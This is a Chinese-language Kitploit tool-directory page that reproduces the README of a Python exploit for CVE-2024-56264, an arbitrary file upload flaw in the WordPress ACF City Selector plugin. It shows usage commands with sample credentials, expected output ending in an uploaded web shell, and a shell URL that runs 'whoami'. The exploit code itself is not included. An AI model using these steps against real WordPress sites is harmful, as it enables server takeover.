Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-56264 — 针对CVE-2024-56264的Python利用工具,WordPress ACF City Selector插件 <=1.14.0中的任意文件上传漏洞,可通过上传Web shell实现远程代码执行。 | Kitploit
工具/GitHubGitHub/dpakmrya/cve-2024-56264
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

针对CVE-2024-56264的Python利用工具,WordPress ACF City Selector插件 <=1.14.0中的任意文件上传漏洞,可通过上传Web shell实现远程代码执行。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-56264

WordPress ACF City Selector - 任意文件上传漏洞利用 (CVE-2024-56264)

概述

本仓库包含 CVE-2024-56264 的利用代码,该漏洞是 WordPress ACF City Selector 插件(版本 <= 1.14.0)中的 任意文件上传 漏洞。攻击者可以通过该漏洞向易受攻击的 WordPress 实例上传 恶意 PHP 文件(Web Shell),并在服务器上执行任意命令。

CVE 详情

  • CVE ID: CVE-2024-56264
  • 发布日期: 2025年1月2日
  • 受影响插件: ACF City Selector
  • 受影响版本: <= 1.14.0
  • 影响: 通过无限制文件上传实现远程代码执行(RCE)

描述

ACF City Selector 插件未能正确验证上传文件,从而允许攻击者 绕过限制 并上传 任意 PHP 文件。一旦恶意 PHP 文件上传成功,攻击者即可远程执行系统命令,导致 服务器完全沦陷。

环境要求

📌 依赖项

运行脚本前请确保已安装以下内容:

  • Python 3.x
  • requests 模块(安装命令:pip install requests)

可使用以下命令安装所有必需的依赖项:

root@kitploit:~
pip install -r requirements.txt

🚀 使用说明

运行漏洞利用工具:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector 插件 <= 1.14.0 - 任意文件上传漏洞

options:
  -h, --help           显示此帮助信息并退出
  --url URL            网站基础 URL(例如:http://192.168.100.74/wordpress)
  --username USERNAME  WordPress 用户名
  --password PASSWORD  WordPress 密码

示例:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

预期输出

成功利用后,您应看到:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

后利用

若成功,可通过以下地址访问上传的 Shell:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

这使得攻击者可以在服务器上远程执行命令。

⚠ 免责声明

本脚本仅用于 教育和授权的安全测试目的。未经授权的使用是非法的,可能导致严重后果。作者 不对任何滥用此漏洞利用工具的行为负责。

下载工具